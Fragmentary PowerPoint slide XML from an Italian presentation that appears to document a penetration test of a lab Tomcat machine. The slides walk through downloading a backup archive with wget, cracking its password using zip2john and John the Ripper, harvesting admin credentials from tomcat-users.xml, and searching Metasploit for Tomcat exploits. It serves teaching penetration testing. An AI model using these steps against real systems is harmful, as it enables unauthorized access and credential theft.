            <a:off x="889533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2D574A72-4333-EDA4-E272-AF58B0A83CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6142669" y="3859506"/>
            <a:ext cx="2611973" cy="230096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3064F1B-4547-A3B6-A9B2-E4A016EFB1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148797" y="1360665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9DAA0B11-ADC5-7C57-6D63-115CF6E911D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895340" y="136095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2656F24F-3B3F-3B62-D95C-6128286003FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402253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74219E84-0E88-40C4-C060-721FB1639B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402254" y="134817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DD2DD3BF-1E82-13F6-8CC2-2E630E328286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630467" y="3859506"/>
            <a:ext cx="2611973" cy="2300961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4472C4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8EDEF159-E7E1-CED4-924E-33310161E37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629418" y="1348173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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="298112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TABLE OF CONTENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC90CC3D-05EE-6228-5A5A-6E9C219BAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718908" y="2803267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Uno sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B793AF34-6614-AEA2-96F9-B50AE3CFF52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629417" y="242871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Strumenti Utilizzati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911EC704-3F17-828E-E68E-CD745D28D0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630720" y="154326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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B312B6-A920-5A54-5724-D7CF16D56138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476318" y="28033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“Scope” di cosa è stato analizzato</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4F4BB3-1CB0-3FD5-5EC6-F319DCE226E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386827" y="24288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Scoping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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B1D64F-9D4F-A16C-C85C-964D00932EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388130" y="15433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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A1E0E7-1AA4-186E-5AEF-8AEF4132AA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238940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Recupero delle informazioni</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58708409-AA91-4FC6-7665-6A5061A16B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149449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Information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Gathering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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43A0249-E69B-B8D4-9A81-F8DEDFC6BCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150752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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6219FA9C-AAF6-4C2A-6056-7244FA6A71BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8993743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della macchina </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B501273F-AFF0-F8BF-F9A6-E80D23535575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8904252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Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EF3834-B6F7-56F4-C86A-B487A5C68A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905555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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5322EF44-D519-CCB9-7D23-AB6F07BB05E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719957" y="5284522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dei servizi esposti dalla macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4535016-F30C-8954-26C5-82F629890E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630466" y="490996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Enumerating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Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49380DD-6FA6-B454-5070-7426BFA0D50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631769" y="402451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3" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBB894C-1FF8-7D81-16BB-969484823587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477367" y="52846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Analisi dei problemi di sicurezza della macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB2C201-EB3D-AD5D-B471-9A67BFBAA78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387876" y="49100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Vulnerability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Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4071A593-F62C-6F5D-6229-96CBDE5FC1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389179" y="40246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6" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974F0F60-73FF-9152-0B82-3AE630A4C40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239989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Sfruttamento delle vulnerabilità identificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A3F5AA-7955-2BD0-810C-4F774F96E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150498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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D69C5A-300A-813F-52B4-58346641FCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151801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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B8FCE1-50DE-B51C-50D9-AEAF9E6F3827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994792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Privilege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Escalation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Mantaining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Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BAFCFD-E52D-C16E-E72C-CC4CAA299C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905301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Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC0D109-E6E8-8745-A06D-F862BDE306F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906604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3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Target exploitation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Cracking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="all" spc="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archivio</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" cap="all" spc="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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1092880" y="1365109"/>
            <a:ext cx="9673389" cy="364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Scarichiamo l’archivio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>backup.zip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> tramite il comando: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>wget http://10.0.2.7:8080/backup.zip</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buNone/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Eseguendo il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>unzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, notiamo che i file presenti nell’archivio sono protetti da password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buNone/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Tramite il tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Zip2John</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> estraiamo l’hash di un file ZIP crittografato </a:t>
            </a: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Poi utilizziamo il programma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>John the Ripper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>per effettuare il cracking delle password</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" b="1" i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRP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D3A6D23-8475-D49F-BF9F-A8BEED067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61" y="4716536"/>
            <a:ext cx="8165677" cy="1912488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75C21E1-7CC9-FF9D-6165-F2C41FE2FC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51349"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2013160" y="3890898"/>
            <a:ext cx="8165677" cy="635990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317738702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Target exploitation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Cracking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="all" spc="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archivio</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" cap="all" spc="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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1092880" y="1365109"/>
            <a:ext cx="9673389" cy="364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Avendo individuato la password, possiamo effettuare l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>unzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> dell’archivio.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buNone/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Notiamo che sono file di configurazione del server Apache Tomcat. In particolare:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tomcat-users.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Questo file definisce gli utenti e i ruoli autorizzati ad accedere al server Tomcat. E possibile ` specificare i nomi utente, le password e i ruoli di ogni utente. Osservando il file, scopriamo le credenziale dell’admin.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" b="1" i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Immagine 9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347CFA1D-015A-1C27-73F7-B9510F7B5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49" y="3679686"/>
            <a:ext cx="4647364" cy="1961947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714AC9D-2EF9-E8BD-6750-F70BC6A3F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04" y="5792152"/>
            <a:ext cx="6178137" cy="503168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87061FD2-067D-D6F2-E2F4-D3B2A86AED8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5411892" y="5242560"/>
            <a:ext cx="2167467" cy="46736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5A69BCCA-4888-79A0-57C5-DE4BF0872868}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4131732" y="5154507"/>
            <a:ext cx="1280160" cy="156495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271261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Target exploitation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Exploit</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065787" y="1615722"/>
            <a:ext cx="9673389" cy="492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Avviamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ed effettuare la ricerca dell’exploit, digitando, digitando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Apache Tomcat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rank:excellent</a:t>
            </a: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Raccogliamo informazioni dei moduli risultanti tramite il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>info</a:t>
            </a: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48558B6-439C-C80F-2B3C-5833762A1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0" y="3618629"/>
            <a:ext cx="11173752" cy="2219702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2199661481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1A3260"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="25468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tangolo 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0A454C-8EBE-BFD1-BDE1-5AFF67ED2052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889533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2D574A72-4333-EDA4-E272-AF58B0A83CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614266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3064F1B-4547-A3B6-A9B2-E4A016EFB1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148797" y="1360665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9DAA0B11-ADC5-7C57-6D63-115CF6E911D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895340" y="136095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2656F24F-3B3F-3B62-D95C-6128286003FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402253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74219E84-0E88-40C4-C060-721FB1639B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402254" y="134817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DD2DD3BF-1E82-13F6-8CC2-2E630E328286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630467" y="3859506"/>
            <a:ext cx="2611973" cy="2300961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4472C4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8EDEF159-E7E1-CED4-924E-33310161E37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629418" y="1348173"/>
            <a:ext cx="2611973" cy="236512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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="298112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TABLE OF CONTENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC90CC3D-05EE-6228-5A5A-6E9C219BAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
